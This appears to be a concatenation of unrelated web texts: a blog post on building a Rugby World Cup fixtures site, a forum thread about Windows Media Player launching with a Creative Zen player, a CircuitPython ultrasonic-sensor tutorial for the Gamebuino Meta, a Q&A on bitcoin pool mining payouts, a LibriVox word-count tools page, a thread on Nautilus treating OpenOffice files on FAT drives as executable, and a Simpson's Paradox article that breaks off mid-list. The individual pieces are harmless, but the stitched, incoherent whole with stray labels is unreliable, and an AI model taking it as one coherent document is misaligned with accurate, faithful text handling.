- The overall federal income tax rate increased from 1974 to 1978 but decreased for every income tax bracket. (Sounds like something we need today!)
- The overall death rate from tuberculosis in 1910 was greater in Richmond (VA) than in New York City, but was less for both whites and non-whites.
Many other examples exist: patient survival rates in two different hospitals, voting patterns, misleading bias in college admissions, deceptive class sizes for different teachers, etc.
If you want to learn more about Simpson's Paradox and its resolution, I suggest these articles, in addition to the wealth of information available on-line:
- J. Mitchem's "Paradoxes in Averages," Mathematics Teacher, April 1989, 250-253
- T. Knapp's "Instances of Simpson's Paradox," College Math Journal, June 1985, 209-210 (source of above fictitious baseball data)
- A. Tan's "A Geometric Interpretation of Simpson's Paradox," College Math Journal, September 1986, 340-341
- M. Calzada & S. Scariano's "Simpson's Paradox and Matrix Determinants," Mathematics and Computer Education, Fall 2000, 237-244
- Z. Usiskin's "Reader Reflections: Simpson's Paradox," Mathematics Teacher, April 1985, 240
|
OPCFW_CODE
|
Adobe’s new Flash Builder version, Burrito, and the Flex SDK Hero previews have been out for a while now. While we were awestruck by the mobile version, its limited platform support saddens us. Burrito supports only the Google Android mobile platform.
So we decided to give Flex SDK Hero a try and build an iPhone app taking advantage of the new Hero features.
This example will walk you through the development of a multiscreen iPhone app using Flex SDK Hero. The whole application was tried out on Windows and not on Mac. I don’t see any difference other than the compilation script changes.
- Install necessary tools
- Create Flex Mobile Project, custom compile and pfi
- Deploying it on iPhone
Things you need
- Flash Builder Burrito and Flex SDK Hero (not necessary – comes with Flash Builder Burrito)
- Packager for iPhone
Download and install Flash Builder Burrito. Burrito comes with Flex SDK Hero and needs no separate installation.
Download and unzip the Packager for iPhone.
Open Flash Builder Burrito, and create a new Flex Mobile Project. Give it a name, say MultiScreenApp. Everything else, leave it as default. Currently Flash Builder supports only Google Android Mobile platform. It doesn’t bother us for now!
Now that the project is created, we get to see the main application, MultiScreenApp.mxml, a spark MobileApplication. This MobileApplication has a spark.components.ViewNavigator which holds a stack of spark.components.View(s).
spark.components.ViewNavigator is a container for storing, displaying and removing views. Listed below are some of the features of ViewNavigator:
- Define view/action bar transition animation
- Persist Navigation stack and restore it back
- Listen to View change events and many more!
- Define properties like title, titleContent, titleLayout which can also be defined in each View.
Now Views can be added to the ViewNavigator and navigated to at any point in time. A View has a navigator associated with it, and so from one View, navigation to any other View is possible using functions like navigator.pushView, navigator.popView, etc.
The spark.components.View class provides basic features like:
- Activating a view
- Manipulating Actionbar (which is displayed at the top of the view) and NavigationContent
- Defining layouts for Actionbar and Navigation Content
- Defining title and data
- Persist the view as such.
The first/default view of the MobileApplication is set through firstView property and its data through firstViewData. The created project looks like this, with a default application and a default view.
Let's try creating a simple Hello World app. Of course much more can be created than this, but the idea is to create an iPhone app out of it. Let's do that.
Create another view that displays the to-be-entered name; let's call it SayHelloView. In order to pass data to this view, override the data setter of spark.components.View.
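A minimal sketch of what that view might look like (the label and property names are made up, and the exact namespaces may differ in your Hero build):

<?xml version="1.0" encoding="utf-8"?>
<!-- SayHelloView.mxml: illustrative sketch only. -->
<s:View xmlns:fx="http://ns.adobe.com/mxml/2009"
        xmlns:s="library://ns.adobe.com/flex/spark"
        title="Say Hello">
    <fx:Script>
        <![CDATA[
            // Override the data setter to pick up the name passed via pushView().
            override public function set data(value:Object):void {
                super.data = value;
                helloLabel.text = "Hello, " + value.name + "!";
            }
        ]]>
    </fx:Script>
    <s:Label id="helloLabel"/>
</s:View>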
Similarly, prepare the Home View.
Everything above is straightforward.
Test and Packaging it!
Now to run the application, we need to add the iPhone device. (This is not mandatory, but you get the feel of an iPhone while testing.) Here is how I have added it.
Once this is done, right click on the project and run it as a Mobile Application. The first time, you'll be asked to choose the method of testing (on Desktop / on Device); for now select "on Device" and pick the added iPhone device. Run it!
Packaging for iPhone
We can't use the swf generated by Burrito as-is, since it is built for a different platform, so we need a simplified project compilation. For that, let's use the command-line mxmlc rather than going Burrito's way!
Here is the command to compile the project for iPhone packaging,
Step 1 – Compiling
"<Burrito's Path>\sdks\4.5.0\bin\mxmlc" -load-config "<Burrito's Path>\sdks\4.5.0\frameworks\airmobile-config.xml" -sp src -o bin-debug\MultiScreenApp.swf src\MultiScreenApp.mxml
This command would produce an swf for our packaging.
Step 2 – Configuring for iPhone
Packaging for iPhone needs special configuration and below is the sample configuration for MultiScreenApp Project. More on iPhone configuration is found on dev guide. Save this file as MultiScreenApp-ios.xml under src directory.
<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!-- Description, displayed in the AIR application installer.
May have multiple values for each language. See samples or xsd schema file. Optional. -->
<!-- <description></description> -->
<!-- Copyright information. Optional -->
<!-- <copyright></copyright> -->
<!-- Publisher ID. Used if you're updating an application created prior to 1.5.3 -->
<!-- <publisherID></publisherID> -->
<!-- Settings for the application's initial window. Required. -->
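Only the comment skeleton fits above, so here is a minimal sketch of the required elements (the application id is a placeholder, and the AIR namespace version depends on the packager build you installed):

<application xmlns="http://ns.adobe.com/air/application/2.0">
    <id>com.example.MultiScreenApp</id>
    <filename>MultiScreenApp</filename>
    <name>MultiScreenApp</name>
    <version>1.0</version>
    <initialWindow>
        <content>MultiScreenApp.swf</content>
        <fullScreen>true</fullScreen>
    </initialWindow>
</application>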
Step 3 – Packaging for iPhone
Now that iPhone configuration is ready lets do the packaging. We’ll use the latest Packager for iPhone, as of this writing the latest version is Oct.11.2010.
If you have already used Packaging for iPhone, you might very well be familiar with the tags used above. If not, get your hands on packager for iPhone dev guide.
Here is the command for packaging the application.
<Packager4iPhone path>\bin\pfi -package -target ipa-test
-provisioning-profile <my.mobileprovision> -storetype pkcs12 -keystore <my.p12> -storepass <pass>
MultiScreenApp.ipa bin-debug\MultiScreenApp-ios.xml -C bin-debug MultiScreenApp.swf assets\icons
You may need a developer certificate, or can get a fake one (for testing) if you are using a jailbroken iPhone. The assets\icons folder has the necessary icons for the application.
The command takes some time to execute. This command will result in a MultiScreenApp.ipa.
Deploy the iPhone app using iTunes or any other method you are familiar with.
What's the point?!!
Well, the point is: "is it worth it?" Considering the performance, UI response and native iPhone feel, the answer is no. But remember, everything we have used above is still in beta, and that means a lot. We have a beginning here, and that makes us experienced by the time the product is ready!!!
|
OPCFW_CODE
|
It would help to know what genre of game you are making. You talk about exposition, "We need to keep the exposition of these ideas short", and I would take this to the extreme if I were you. Show, don't tell. If players don't learn the concepts from the gameplay, then the game isn't about those concepts.
For example, if you want to teach players that AI optimism is not a good default and alignment is hard, give them a chance to do an alignment task or make alignment choices in which there are optimistic options that end badly. Or make a game that's almost unwinnable, to emphasize how hard the problem is.
Have you played universal paperclips? I've found it a fun first introduction to ai alignment for people with no knowledge of the topic.
Can we agree to stop writing phrases like this: "Not only do I not think that the Alignment Problem is impossible/hopelessly bogged-down, I think ..."? The three negatives are a semantic mess. Some of us are still using our wetware here for decoding prose.
Perhaps "Not only am I still hopeful about the alignment problem, but I think" or even "I don't think the alignment problem is hopelessly bogged-down, and I think..."
My understanding is that 'blockchains' are, today, pretty centralized, especially effectively (i.e. in practical ways that matter). Any particular 'blockchain' also seems possibly 'lost' (e.g. abandoned), 'made obsolete', etc.. Isn't there any inherent and inevitable 'social expense' that has to be continually made anyways?
Not really. The blockchains themselves are decentralized, but the applications built on top of them are centralized. To my buying a movie example, suppose I have an app on my SmartTV called "stream1" that lets me buy movies and register them via NFT (cool). I would prefer that to buying them from say Amazon Prime which did not have NFTs, even if it cost an extra dollar or two. 5 years later, stream1 shuts down. I'm not saying I would actually go torrent the movie. What might happen instead is that a new company starts up called "stream2" which allows you to play movies you've bought in the blockchain, as well as buy new movies. Or maybe Amazon prime has added the feature by then and I can connect my licenses to their service. This is equivalent to a new company coming out that sell Blu-ray players. You already own the Blu-rays, they're offering you a way to play them.
I'm very skeptical that the companies that sell products like this would willingly offer terms like what you seem to have in mind, e.g. 'Pay us and then just torrent the movie whenever you want!'.
But this is precisely what we had before the internet. We used to have physical media that (theoretically) could be copied to multiple devices. You weren't legally allowed to, but the technology left you in control. I know gamers as a group want this control back after getting shafted by video game companies.
How would the person or organization requesting someone's diploma verify that the NFT was issued by the relevant college/university?...Surely some kind of centralized database is still required, right? Wouldn't the entity requesting the invoice need to have some kind of 'whitelist' of entities that are approved to issue these NFTs?
No not at all. The blockchain can do this. The blockchain contains information about who minted it. So a hiring company - say, Google - would know which wallet MIT used for minting their diplomas. If it came from that wallet, then it's legit. In the long run, applications could create a more user-friendly layer. So you paste in the relevant info to your job application, and Google's HR database automatically verifies it on the blockchain.
this just seems like a more convoluted way to 'paywall' a download endpoint.
Definitely it seems like a paywall because it is a paywall. Just a more balanced one. As it is, any time you join any kind of DRM or paywall scheme, you're completely at the mercy of the content host, who can remove your rights to all the stuff you "bought" at any time.
I think this is where there's been a beanie-baby craze with this stuff on the supply side - where some parties are eager to just sell more because there's a new channel. When in fact, what we have is a better channel, and we need to move old sales onto the new channel.
Sure, existing markets won't like it - because they lose control. But it's comparable to how Netflix disrupted Cable TV. People liked the way Netflix served the content better, and cut their cables. Then they became too big to ignore, and all the major content owners got on board. I could see this happening with NFTs too. If I went to buy some digital content and there were two competing marketplaces - I would 100% choose the one that let me really own my purchase via NFT, instead of one that requires me to just trust them to keep it for me.
Trust powers commerce, and I really believe NFT marketplaces implemented properly will drive more people to buy with confidence.
losing access to whatever 'wallet' the NFT is associated with
The process would be the same as if I lost my Physical diploma. Call the university and they have to mint an identical one for me, at a cost to me.
So there are lots of situations where receipts are pretty important, but increasingly there is a push to have them be digitized, either because it's just more efficient or the asset itself is digital. For example, suppose you buy a movie through your smart TV.
The problem is these digital receipts tend to either be just downloadable PDFs - easily forged and effectively meaningless - or they're central databases, which are under the control of the party that owns the database. They can be revoked, lost, made obsolete, etc. Suppose the company that holds my downloaded movie purchase goes bankrupt. Now if I torrent that movie I'm not really breaking the law, or am I? How would I prove that?
A decentralized blockchain system would solve those problems and could be used for proving all kinds of things. "Send us a copy of your diploma" - "here, it's an NFT", "send us your invoice to prove you are in warranty", "here's the NFT", "Can you sell me your old copy of Civilization 4?" "Yes, I'll transfer the NFT to you for $40".
The potential to store trusted receipts has so many useful applications, we're just not quite there yet in terms of building it.
This is my thought exactly. The digital art NFTs that are selling now are a distraction.
NFTs are a decentralized receipt system which is totally awesome and which you cannot get rich off by collecting receipts.
I also play a few games of chess.com every morning and I have found it has the same use you describe.
I read this book by Rovelli. It's supposed to be the best explanation available, but I still don't really get it.
In the end he suggests that entropy is why we can remember the past but not the future. I'm not sure that's it though.
Still a good read.
|
OPCFW_CODE
|
This article describes a method for remotely accessing virtual servers. The aim is to be able to have multiple clients access one or more virtual servers across one or more physical hosts as if everyone was on the same LAN. It is also necessary to do this without compromising on security and without ANY extra configuration for the virtual servers.
We will achieve this using Qemu and Openvpn.
I’m assuming you have basic knowledge of whatever host operating system you’re using and basic networking knowledge.
I’m not going to bother telling you how to install the two programs you need, etc.
Other than that, I hope I’ve covered everything (or at least pointed you towards external documentation).
If there’s something you’re stuck on then leave a comment or email me (address below) and I’ll do my best to assist and update this guide if necessary.
I will assume that you already have your virtual machines set up. If not then the Qemu manual will get you started.
The guest can be basically any operating system that’s capable of networking. No special configuration is required. I’m just using a few existing virtual machines from previous projects.
You will need to add the following options to the qemu command line:
"-net nic -net tap,script=no,downscript=no"
The “-net nic” option creates a virtual network card. The “-net tap” option creates a tap network device on the host, we will connect this to Openvpn later. For an explanation of what this means, see the Wikipedia article.
Start your virtual machine with the additional options given and assign it a static IP address (I’m using 10.0.0.1).
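Putting it together, a typical invocation might look like this (the disk image name and memory size are placeholders):

# qemu -hda guest.img -m 512 -net nic -net tap,script=no,downscript=no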
The Openvpn website contains all the information you could want on configuring Openvpn.
Here’s a link to the documentation: http://openvpn.net/index.php/open-source/documentation/howto.html
Pick a set of instructions that suit your needs and use them as a basis for this setup.
If you only need to connect to the server from one client, select the “quick start guide”. If you need more than one then follow the sections titled “Setting up your own Certificate Authority (CA) and generating certificates and keys for an OpenVPN server and multiple clients.” and “Creating configuration files for server and clients”.
Either of these sets of instructions will give you a decent basis for the rest of this guide. We will choose an IP range for the VPN later on.
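If you go the multi-client route, the classic easy-rsa workflow looks roughly like this (a sketch of the 2.x-era scripts; paths vary by distribution):

# cd /etc/openvpn/easy-rsa
# . ./vars
# ./clean-all
# ./build-ca
# ./build-key-server server
# ./build-key client1
# ./build-dh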
Routing or Bridging?
You’ll also need to choose between creating a bridged network or a routed network. Again, the Openvpn site has plenty of information on making this choice, consider reading this page.
In summary, use bridging if you need network broadcasts for any reason or want to be able to browse for windows shares (eg: under “network neighbourhood”, etc). Otherwise use routing.
The two (rather crude, I’m afraid) diagrams below illustrate the differences between the two setups.
In the bridged setup, ethernet frames (black arrows) are transferred across the VPN. This enables non-IP traffic to be transferred, but increases the overheads. The two TAP devices are bridged in this setup.
In the routed setup, IP packets (green arrows) are transferred across the VPN. This results in less data needing to be transferred across the VPN.
IP range setup
If you’re using a bridged setup then you should use the “server-bridge” option to set the client and server IPs.
You should put everything in the same subnet.
You should leave some room free in the subnet for the virtual server.
For example, I assigned my virtual server 10.0.0.1.
I’m assigning the Openvpn server 10.0.0.2 and clients IPs from 10.0.0.50 to 10.0.0.100.
The config file line looks like this:
server-bridge 10.0.0.2 255.255.255.0 10.0.0.50 10.0.0.100
If you’re using a routed setup then you should use the “server” option to set the client and server IPs.
You should use separate subnets for the VPN and the virtual server.
For example, my virtual server is 10.0.0.1.
I’m assigning the Openvpn server 10.1.0.1 and clients IPs from 10.1.0.2 to 10.1.0.254.
The config file line looks like this:
server 10.1.0.0 255.255.255.0
You’ll also need to tell the Openvpn server to instruct clients to add a routing entry for the virtual server’s subnet:
push "route 10.0.0.0 255.255.255.0"
Connecting the two
The method for connecting the two is different depending on whether you chose bridging (tap adapter) or routing (tun adapter). Either way, I assume you’ve started Qemu and Openvpn successfully and can connect to the Openvpn server ok.
For the bridging scenario you have two tap devices, one created by Qemu and one by Openvpn. All you need to do is bridge the two.
Configure the tap devices:
# ifconfig tap0 0.0.0.0 promisc up
# ifconfig tap1 0.0.0.0 promisc up
Create the bridge device:
# brctl addbr br0
# ifconfig br0 0.0.0.0 promisc up
Add the tap devices to the bridge:
# brctl addif br0 tap0
# brctl addif br0 tap1
If you chose to configure Openvpn for routing then you have one tap device created by Qemu and one tun device created by Openvpn.
It’s just a simple matter of configuring the host to forward packets between the two.
Assign an IP address to the tap device:
# ifconfig tap0 10.0.0.2
Enable IP forwarding
# echo 1 > /proc/sys/net/ipv4/ip_forward
Testing it out
You should now be able to communicate between the client and the virtual server.
If you chose a routed setup, you can also ping between the client and physical server (over the vpn) and between the physical server and the virtual one. This may be useful for locating problems.
Adding more virtual servers
In a bridged setup, adding more virtual servers is extremely easy. Simply start the new VM exactly as you did the first one and add the new TAP device to the bridge.
# brctl addif br0 tap2
With a routed setup, if you want more than one virtual server you'll have to add a host route for each virtual server. Each additional VM still gets an address in the virtual server's subnet (10.0.0.x in this example), with its route pointing at its own tap device:
# route add 10.0.0.3 dev tap1
# route add 10.0.0.4 dev tap2
Adding more physical servers
If you add more physical servers then they will (confusingly) be openvpn clients.
Configure it exactly like any other client. Connecting the virtual servers on a new physical server is done exactly as we did it earlier in the article.
You will need to add the “client-to-client” option to your configuration file.
If you see any errors with this article, have any comments/suggestions or need any help then feel free to leave a comment or email me (address below) and I will get back to you.
Thanks for reading, I hope this has been useful.
|
OPCFW_CODE
|
Spotify API Inconsistency: Integer Values Returned as Floats Without Documentation Update
We've observed a recent and undocumented change in Spotify's API behavior, specifically regarding the data type of certain values that were traditionally returned as integers. This alteration is gradually being implemented across various endpoints, with a notable example being the tracks endpoint. Previously, values such as "duration_ms" would be returned as integers (e.g., "duration_ms": 2345). However, we are now receiving these values as floats (e.g., "duration_ms": 2345.0), despite the official web API reference still indicating that integers are to be expected.
This discrepancy has been confirmed to affect multiple endpoints and is causing issues for applications with strict type requirements, where floats are not expected in places where integers were previously provided. As a result, typed applications that rely on these integer values are experiencing breaks in functionality.
A discussion thread exists on the Spotify Developer Forums highlighting this issue, but responses and clarifications from Spotify have been minimal: Spotify Developer Forums Thread.
As a temporary workaround, I have modified all applicable properties in my application from type int to float and performed a cast back to int where necessary (I'm still on a very old version of SpotifyAPI-NET, but I guess this affects the latest version too). Checking the latest code, the models for the API response are still typed, so this issue will also arise in the current release. While this approach has resolved the issue for my application and benefitted my users, it is not an ideal or sustainable solution.
The staggered rollout of these API changes has further complicated diagnosis and troubleshooting, especially since the effects were not immediately evident across all user bases.
I am raising this issue here so others know what's up, if they encounter Newtonsoft.Json.JsonReaderException.
Discussed in https://github.com/JohnnyCrazy/SpotifyAPI-NET/discussions/925
Originally posted by rogamaral January 5, 2024
Since yesterday and suddenly, without any changes to the code, I started to have the following exception:
Newtonsoft.Json.JsonReaderException:
'Input string '359120.0' is not a valid integer.
Path 'followers.total',
line 1, position 127.'
var artist = await _spotify.Artists.Get(artistId);
Does anyone else also have this problem?
Thanks.
This issue seems to be happening to multiple developers, including myself, and has been discussed previously in #925, #926 and #928. For me, it randomly stopped happening after few days.
I'm aware that this was discussed. I raised the issue out of #925 to further spread awareness for it.
The Newtonsoft.Json deserializer will happily convert an int returned from the API into a double when a double is expected. That's why the approach of changing the property types might work long term.
Well, I should have read all the discussions beforehand. It seems the serializer has already been modified to convert.
My bad!
Hi @Inzaniity,
I'm also experiencing the JsonReaderException on some properties, for instance album.total_tracks. Updating to the latest SpotifyAPI.Web (7.1.1) did not fix them all.
If I add the DoubleToIntConverter attribute to the properties that still cause the exceptions it's ok again.
So it seems to me we should add the DoubleToIntConverter attribute to all int properties so it doesn't break when Spotify decides to return doubles/floats somewhere. What do you think?
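For reference, such a converter is only a few lines in Newtonsoft.Json. A sketch (the model class and property here are hypothetical; the library's actual DoubleToIntConverter may differ in detail):

using System;
using Newtonsoft.Json;

// Coerce JSON numbers like 2345.0 back to int when the model expects int.
public class DoubleToIntConverter : JsonConverter<int>
{
    public override int ReadJson(JsonReader reader, Type objectType,
        int existingValue, bool hasExistingValue, JsonSerializer serializer)
    {
        // reader.Value is a long for "2345" but a double for "2345.0".
        return Convert.ToInt32(reader.Value);
    }

    public override void WriteJson(JsonWriter writer, int value, JsonSerializer serializer)
    {
        writer.WriteValue(value);
    }
}

public class AlbumModel
{
    [JsonProperty("total_tracks")]
    [JsonConverter(typeof(DoubleToIntConverter))]
    public int TotalTracks { get; set; }
}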
I mean that is what I did but on an older code base. So yeah, converting all expected ints seems to be the solution here.
A Spotify developer confirmed a fix for this in the discussion on the Spotify developer forum
An optimization in the deserialization of JSON in upstream was causing the serializer to default to double types for integer values. The optimization was not applied to all queries, and several tools were sanitizing the response which was the reason we did not uncover this from the start.
|
GITHUB_ARCHIVE
|
A Python tutorial on the beginner's first 8 Python math functions to learn before advancing to more difficult math in NumPy and Pandas modules.
Videos can also be accessed from our Full Stack Playlist 3 on YouTube.
Eight Python builtin math functions | Python for Beginners (4:51)
Welcome. Today's question: Which 8 math functions should Python beginners learn first?
I'm Paul, and here we cover data science, so it's important that we learn basic math functions before heading off to the exotic, fun and head-scratching stuff like Statistics.
So here we'll stick with functions built-in to Python with a review of 3 we covered earlier, then tack on 2 for calculations on single numbers, followed by 3 that operate on a range of numbers.
This closes out the 11-video Project 3 (Python for Beginners). Hang on for the end and I'll tell you what Project 4 is all about.
(Commands in Linux)
(Functions in Python)
Let's head to the Linux terminal and here's a file with all of the built-in functions in this version of Python.
Noted is where each function was introduced, and here in video 32, we're checking off absolute value, power, maximum, minimum and summation.
| abs() (32) | dict()       | help() (28)  | min() (32)   | setattr()  |
| bin()      | eval()       | int() (27)   | open()       | str() (26) |
| bool()     | exec()       | isinstance() | ord() (26)   | sum() (32) |
| bytes()    | float() (27) | iter()       | print() (26) | tuple()    |
| complex()  | hasattr()    | max() (32)   | round() (27) |            |
(Also See official documentation at the official python.org.)
For now we're working with two data types in math, we have integers, and when entered without a decimal place, Python assumes it's an integer.
We also have floats, or floating point numbers entered with a decimal.
So with 8 functions to cover; let's get cracking.
Function 1 is int(), which views a float as an integer.
It won't change it; it will just view it (as an integer).
Function 2, float(), does the opposite: it views an integer as a float.
Function 3 is round(), and here we can input how many decimal places we'd like to round a number to, using an optional argument after a comma telling Python where you want it to round.
The default rounds to a whole number. And there's object help, if you forget how it works.
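In the interpreter, those three look something like this (the sample values are mine, not from the video):

>>> int(3.7)
3
>>> float(3)
3.0
>>> round(3.14159, 2)
3.14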
Function 4 is absolute value. Here's the help.
q to leave.
Here we input one number and it returns the absolute value, so
abs(x), where x is negative 2, becomes 2.
It works with floats too.
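For example:

>>> abs(-2)
2
>>> abs(-2.5)
2.5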
Function 5, Python power. Let's get in the habit of looking at help,
help(pow) in this case.
And let's do the two argument version.
So it goes 3 to the power of 2 is 9, and going the other way, 9 to the power of one-half, or the square root, is 3.0.
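In the interpreter:

>>> pow(3, 2)
9
>>> pow(9, 0.5)
3.0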
For function 6, let's set up a range of numbers, let's call them grades, and assign some percentile scores over a semester, like this.
I'll put them in what is called a list like this, and use
max() to find the highest grade of 99.
With help() we can see there are two ways to work with max(), and here we're using the second option, saving the first one (on iterables) for later.
min() is done the same way.
No surprises there.
Function 8 is summation, or sum(). Check help(sum) to see how it works; it won't work on text, which is obvious.
Let's throw the list of grades in and we get 442.
But that's more meaningful if we get an average, dividing by 5 and that gives us 88.4, eh, a B-plus.
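Replayed in a Python 3 interpreter, with hypothetical scores chosen to match the totals in the video (sum 442, high grade 99):

>>> grades = [99, 88, 85, 84, 86]
>>> max(grades)
99
>>> min(grades)
84
>>> sum(grades)
442
>>> sum(grades) / 5
88.4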
On the topic of average, and other statistical calculations we won't have to put them together ourselves like this. Instead, in later videos we'll import modules allowing us to do linear algebra, regressions and all sorts of math with neat visualizations.
Also, if you're not familiar with my background, in a previous life, I managed $5 Billion in stock mutual funds in the US, so the subject matter expertise I'll bring to the table is in the financial markets.
So a number of projects will be geared to those aspiring to be financial engineers, quants and portfolio managers. We'll also use Python to analyze data for marketing, social media and more.
In the meantime, this concludes Project 3, and in Project 4 we'll kick off HTML and CSS for Beginners so we can create web pages to view all of our neat output in a browser.
And coding right in the Python Interpreter will be phased out as well. We'll work with multi-line files almost exclusively.
To be part of the fun, please subscribe and comment so others can learn from your insights, and your observations.
Have a nice day.
|
OPCFW_CODE
|
This initiative advanced the use of open standards for integrating environmental, building, and IoT data in Smart Cities. It focused on the capabilities to be supported by a 3D IoT Smart City Platform under CityGML, IndoorGML, and SensorThings API. Scenarios explored included real-time monitoring of micro-dust and indoor occupancy.
The goal of the pilot has been to advance the use of open standards for integrating environmental, building, and internet of things (IoT) data in Smart Cities. Under this initiative a proof of concept (PoC) has been conducted to better understand the capabilities to be supported by a 3D IoT Smart City Platform leveraging the following standards:
Outdoor 3D City Model: CityGML
Indoor 3D Model: IndoorGML
Geo-IoT: SensorThings API
The scenarios selected to demonstrate this concept included:
Real-time monitoring of indoor occupancy (IndoorGML + SensorThings)
Real-time monitoring of PM2.5 micro-dust (CityGML + SensorThings)
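For flavor, a SensorThings API request for the latest PM2.5 readings might look like this (the Datastream id is a placeholder):

GET /v1.0/Datastreams(42)/Observations?$orderby=phenomenonTime desc&$top=10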
Smart cities are communities where information technology and data are used to address social, economic, and environmental challenges. Smart Cities solutions are both popular for improving city livability, and necessary for responding to trends such as climate change and increasing urbanization.
Sejong City, founded in 2007, is the new administrative city of South Korea. Sejong 5-1 (A District) is the site of a wide-ranging Smart City initiative, led by the Korea Land and Housing (LH) Corporation. Projects under this initiative include the following:
AR/VR Service (Smart City Experience Zone)
A video of the Sejong City Smart City Initiative is available on YouTube.
The Korea Land and Housing (LH) Corporation sponsored this OGC pilot that complemented the work being advanced in the Sejong Smart City Initiative.
The following organizations were selected as initiative participants. Each participating organization had specific deliverables and tasks based on their responses to the Call for Participation.
Steinbeis Transferzentrum Technische Beratung an der HFT Stuttgart
Feng Chia University (GIS.FCU)
Call for Participation
Call for Participation (CfP) release
CfP responses due
Selection of Participants and Bidder Notifications
Initial Test and Integration Testing: 02-Oct-2019 to 28-Feb-2020
Engineering Report Draft
OGC Technical Meeting in Asia
Final Engineering Report
Demonstrations are planned for the June virtual TC; demonstrations for Asia will likely occur, physically or virtually, in Korea in August 2020.
We represent over 500 businesses, government agencies, research organizations, and universities united with a desire to make location information FAIR – Findable, Accessible, Interoperable, and Reusable.
|
OPCFW_CODE
|
One more Distro: IPFire - Lightest weight - Works w/Hyper-V
IPFire is an option worth considering.
quote:It will run as a Hyper-V guest without any special integration tools.
Requirements are minimal: an Intel Pentium I compatible CPU (i586), 128 MB RAM, and 1GB disk space.
For routing, at least 2 network interfaces are required.
Actually, it was the only distro I could get to run under Hyper-V - way back when.
Below is the text from their feature page.
You can find a list of selected addons below, or take a look at the list of all addons!
The Samba addon offers a fast file server for Windows or heterogeneous networks.
The NFS server offers the possibility to share files over the network.
CUPS is a standard, open source, printing system over the network.
The mail server that IPFire uses is a mixture of Cyrus-IMAPd, Postfix and Openmailadmin.
Additionally you can choose: Fetchmail, SpamAssassin and ClamAV or other virus scanners.
MPFire (TESTING) adds jukebox features to IPFire.
Icecast streams the output of MPFire to the network.
Gnump3d is a server for streaming MP3- and OGG-files.
VDR (TESTING) is a video recording / streaming server for digital TV cards.
Videolan (TESTING): The VLC player is a streaming server solution - see more at: http://www.videolan.org
Voice over IP
Asterisk (TESTING) is the ideal platform for Voice over IP - have a look at: http://www.asterisk.org/
Teamspeak offers you your own VoIP communication server at home. Brilliant for SWTOR or WoW Raids ;-) - find more at: http://www.teamspeak.com. (It is also possible to install a Teamspeak 3 Server)
Guardian analyzes Snort files and ssh logfiles and blocks the source IP (so the IDS can be upgraded to an IPS).
Tripwire is a host-based IDS system, i.e. it monitors local changes.
Lynis is a command-line auditing tool for a local scan of system and software.
Cryptsetup: with Cryptsetup and the kernel module “dm-crypt”, it is possible to create encrypted devices.
PPTP (TESTING) VPN access through PPTP.
mdadm (TESTING): With mdadm it is possible to create software RAID devices.
RTorrent Bittorrent Client for ncurses written in C++ : it's small and fast.
Transmission: a Bittorrent client with a web interface.
Sane allows you to scan documents via the network with a web interface.
Qemu virtualization for guest OSes in IPFire - 64bit hardware and Hyper-V is recommended.
Dirvish is a backup solution for IPFire (no regular IPFire addon!!!).
TinyWebGalerie is a free PHP based WebGallery for IPFire.
Apcupsd is a tool to monitor APC's Uninterruptible Power Supplies (UPS).
NUT TESTING Network UPS Tools.
miau, a bouncer for IRC networks.
watchdog TESTING Watchdog daemon.
pound TESTING Reverse proxy and load balancer.
Tftpd IPFire as a Tftpd server.
SideMenu EX: extension of IPFire's side menus (not a regular IPFire addon!!).
BackupPC: backup solution with a web interface (not a regular IPFire addon!!!).
Cacti Tool for visualization of network data with RRDtool and SNMP.
Nagios powerful tool for the monitoring of complex IT infrastructures.
EGroupware EGroupware is a powerful communication solution for companies and groups (not a regular IPFire Addon!!!).
Xen Paravirtualization of guest operating system
mdns-repeater - mDNS repeater daemon (in progress)
Some tools to optimize your network and for troubleshooting
iperf tests your network speed (LAN or WLAN).
bwm-ng is a bandwidth monitor.
nmap is a versatile (and very powerful) IP/port scanner - see: http://nmap.org for further details.
tcpdump is a tool to capture and inspect your network traffic.
iftop is a realtime bandwidth monitor.
traceroute is a network tool used to follow your packets through the internet.
Wireless IPFire with hostapd
Server functions do not belong on an edge appliance! I refer to those types of firewall distros as swiss-army-knife distros that try to be everything.
Also, running a firewall on a virtual appliance makes as much sense as wearing virtual underwear, except for development.
When IPFire first started, the developer was trash-talking a few other distros, yet the same developer was using quite a bit of code copied directly from the very distros he was badmouthing. I have no confidence in this individual.
|
OPCFW_CODE
|
Effects and Animations
Selecting Components Within the DOM With jQuery
- While you could use two IDs – one to open the overlay and another to close it – you'll instead use a class to open and close the overlay with the same function (see the sketch after this list).
- I love the way you show how HTML, CSS, JS, and jQuery work together.
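A minimal sketch of that pattern (the class and ID names are made up):

<script>
  // One class, one handler: the same function opens and closes the overlay.
  $(".overlay-toggle").on("click", function () {
    $("#overlay").toggle();
  });
</script>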
This article will cover the features of jQuery, the logic and reasons behind the framework's success, and how it has stayed so relevant all this time. According to Stack Overflow's 2023 survey, 22.87% of developers still use jQuery; it is the third most popular web framework and one of the most-starred repositories on GitHub. Some would argue that it is large, which might affect your web performance… However, because of its popularity, it is likely to have already been used on some site you have visited before. Most browsers nowadays are good about caching scripts/images, so that download hit is reduced over time.
Most Popular Programming Languages to Learn in 2023
At the very least, create a manual WordPress backup before you proceed. The kind of DOM manipulation described above would go unnoticed by web visitors if it all happened the moment a page loaded. That's why your jQuery application can detect and respond to events like mouse clicks, mouse movement, keystrokes, and more to create a truly responsive experience. Add jQuery to your website by linking the library's code from the site's pages. The jQuery library can live on your web server or on a publicly accessible content delivery network (CDN). The official jQuery website can hook you up with the latest versions of the library.
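For instance, pulling the library from the official CDN is a single tag (the version number is just an example):

<script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>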
And if you want to build jQuery-powered websites and applications, check out Kinsta's WordPress hosting, Application hosting, and Database hosting options. The jquery alias has been assigned to the jQuery library on the Cloudflare CDN, and it remains a dependency for the local my_script. You can use the same approach to pull other jQuery components – like jQuery UI – from a CDN.
Add jQuery UI plugins to your projects, and you'll have access to many special effects and widgets built on the core jQuery library. Here's an example using jQuery UI to add a pop-up calendar as a date-picker within a web form. jQuery UI is a popular collection of plugins designed to enhance user interfaces. jQuery also offers a unified, consistent API that operates across different browsers, eliminating the need for browser-specific code. The idea behind the success lies in the framework's ability to bring more people on board. To explain, this framework is supported by a large community of developers, demonstrating that jQuery is not only still current but is also here to stay for a long time.
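That date-picker example is only a few lines (the input id is arbitrary, and the jQuery UI script and CSS are assumed to be loaded already):

<input type="text" id="date-field">
<script>
  // Attach a jQuery UI pop-up calendar to the text input.
  $(function () {
    $("#date-field").datepicker();
  });
</script>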
|
OPCFW_CODE
|
